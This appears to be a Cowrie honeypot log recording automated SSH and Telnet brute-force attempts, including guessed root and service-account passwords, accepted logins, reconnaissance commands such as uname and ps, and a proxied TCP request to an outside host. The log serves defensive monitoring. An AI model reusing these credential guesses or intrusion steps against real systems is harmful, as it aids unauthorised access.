{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:23:39.408775Z","src_ip":"212.227.235.229","session":"f18e04a148b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:39.525116Z","src_ip":"212.227.235.229","session":"eb7b9b5c1132"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:39.526655Z","src_ip":"212.227.235.229","session":"eb7b9b5c1132"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:23:39.552522Z","src_ip":"212.227.235.229","session":"f18e04a148b5"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-28T05:23:40.104640Z","src_ip":"212.227.235.229","session":"f18e04a148b5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:41.251081Z","src_ip":"212.227.235.229","session":"f18e04a148b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53818,"dst_ip":"1.2.3.4","dst_port":22,"session":"149cdc9535d3","protocol":"ssh","message":"New connection: 212.227.125.160:53818 (1.2.3.4:22) [session: 149cdc9535d3]","sensor":"my-vps","timestamp":"2025-08-28T05:23:46.151261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:23:46.152307Z","src_ip":"212.227.125.160","session":"149cdc9535d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:23:46.255964Z","src_ip":"212.227.125.160","session":"149cdc9535d3"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:23:46.568258Z","src_ip":"212.227.125.160","session":"149cdc9535d3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:47.694124Z","src_ip":"212.227.125.160","session":"149cdc9535d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35542,"dst_ip":"1.2.3.4","dst_port":22,"session":"68b6d7024fac","protocol":"ssh","message":"New connection: 212.227.125.160:35542 (1.2.3.4:22) [session: 68b6d7024fac]","sensor":"my-vps","timestamp":"2025-08-28T05:24:01.867331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:24:01.874459Z","src_ip":"212.227.125.160","session":"68b6d7024fac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:24:01.971453Z","src_ip":"212.227.125.160","session":"68b6d7024fac"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:24:02.386773Z","src_ip":"212.227.125.160","session":"68b6d7024fac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:24:02.616371Z","src_ip":"212.227.125.160","session":"68b6d7024fac"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:24:02.617125Z","src_ip":"212.227.125.160","session":"68b6d7024fac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:02.728137Z","src_ip":"212.227.125.160","session":"68b6d7024fac"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:02.729273Z","src_ip":"212.227.125.160","session":"68b6d7024fac"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":61247,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3e46782b144","protocol":"ssh","message":"New connection: 186.225.142.90:61247 (1.2.3.4:22) [session: b3e46782b144]","sensor":"my-vps","timestamp":"2025-08-28T05:24:02.751280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:24:03.153928Z","src_ip":"186.225.142.90","session":"b3e46782b144"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:24:03.154952Z","src_ip":"186.225.142.90","session":"b3e46782b144"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"e51578d1a894","protocol":"ssh","message":"New connection: 212.227.125.160:64001 (1.2.3.4:22) [session: e51578d1a894]","sensor":"my-vps","timestamp":"2025-08-28T05:24:03.668251Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:03.720007Z","src_ip":"212.227.125.160","session":"e51578d1a894"}
{"eventid":"cowrie.login.success","username":"root","password":"0890105521*#&!","message":"login attempt [root/0890105521*#&!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:24:04.880854Z","src_ip":"186.225.142.90","session":"b3e46782b144"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:24:05.378421Z","src_ip":"186.225.142.90","session":"b3e46782b144"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-28T05:24:05.379144Z","src_ip":"186.225.142.90","session":"b3e46782b144"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:05.573411Z","src_ip":"186.225.142.90","session":"b3e46782b144"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:05.574490Z","src_ip":"186.225.142.90","session":"b3e46782b144"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50739,"dst_ip":"1.2.3.4","dst_port":22,"session":"d41da954fd4d","protocol":"ssh","message":"New connection: 212.227.125.160:50739 (1.2.3.4:22) [session: d41da954fd4d]","sensor":"my-vps","timestamp":"2025-08-28T05:24:07.894614Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:07.896069Z","src_ip":"212.227.125.160","session":"d41da954fd4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50995,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a19fc3bb48b","protocol":"ssh","message":"New connection: 212.227.125.160:50995 (1.2.3.4:22) [session: 2a19fc3bb48b]","sensor":"my-vps","timestamp":"2025-08-28T05:24:08.005230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:24:08.006683Z","src_ip":"212.227.125.160","session":"2a19fc3bb48b"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T05:24:08.118024Z","src_ip":"212.227.125.160","session":"2a19fc3bb48b"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:24:08.453640Z","src_ip":"212.227.125.160","session":"2a19fc3bb48b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T05:24:08.565932Z","session":"2a19fc3bb48b"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":39008,"dst_ip":"1.2.3.4","dst_port":23,"session":"e6648deb4155","protocol":"telnet","message":"New connection: 176.65.149.186:39008 (1.2.3.4:23) [session: e6648deb4155]","sensor":"my-vps","timestamp":"2025-08-28T05:24:16.043408Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:24:16.081673Z","src_ip":"176.65.149.186","session":"e6648deb4155"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:24:16.101467Z","src_ip":"176.65.149.186","session":"e6648deb4155"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T05:24:16.102649Z","src_ip":"176.65.149.186","session":"e6648deb4155"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T05:24:16.103565Z","src_ip":"176.65.149.186","session":"e6648deb4155"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58654,"dst_ip":"1.2.3.4","dst_port":22,"session":"ead2ddd31471","protocol":"ssh","message":"New connection: 212.227.125.160:58654 (1.2.3.4:22) [session: ead2ddd31471]","sensor":"my-vps","timestamp":"2025-08-28T05:24:17.163272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:24:17.183300Z","src_ip":"212.227.125.160","session":"ead2ddd31471"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:24:17.272789Z","src_ip":"212.227.125.160","session":"ead2ddd31471"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:24:17.688982Z","src_ip":"212.227.125.160","session":"ead2ddd31471"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:18.795244Z","src_ip":"212.227.125.160","session":"ead2ddd31471"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39960,"dst_ip":"1.2.3.4","dst_port":22,"session":"6944a0f3a789","protocol":"ssh","message":"New connection: 212.227.235.229:39960 (1.2.3.4:22) [session: 6944a0f3a789]","sensor":"my-vps","timestamp":"2025-08-28T05:24:31.602530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:24:31.603793Z","src_ip":"212.227.235.229","session":"6944a0f3a789"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:24:31.748564Z","src_ip":"212.227.235.229","session":"6944a0f3a789"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:24:32.350856Z","src_ip":"212.227.235.229","session":"6944a0f3a789"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:33.502764Z","src_ip":"212.227.235.229","session":"6944a0f3a789"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57470,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2f22fa8f107","protocol":"ssh","message":"New connection: 212.227.235.229:57470 (1.2.3.4:22) [session: d2f22fa8f107]","sensor":"my-vps","timestamp":"2025-08-28T05:24:38.995333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:24:38.999669Z","src_ip":"212.227.235.229","session":"d2f22fa8f107"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:24:39.141394Z","src_ip":"212.227.235.229","session":"d2f22fa8f107"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:24:39.723591Z","src_ip":"212.227.235.229","session":"d2f22fa8f107"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:24:40.094633Z","src_ip":"212.227.235.229","session":"d2f22fa8f107"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:24:40.095338Z","src_ip":"212.227.235.229","session":"d2f22fa8f107"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:40.242077Z","src_ip":"212.227.235.229","session":"d2f22fa8f107"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:40.243206Z","src_ip":"212.227.235.229","session":"d2f22fa8f107"}
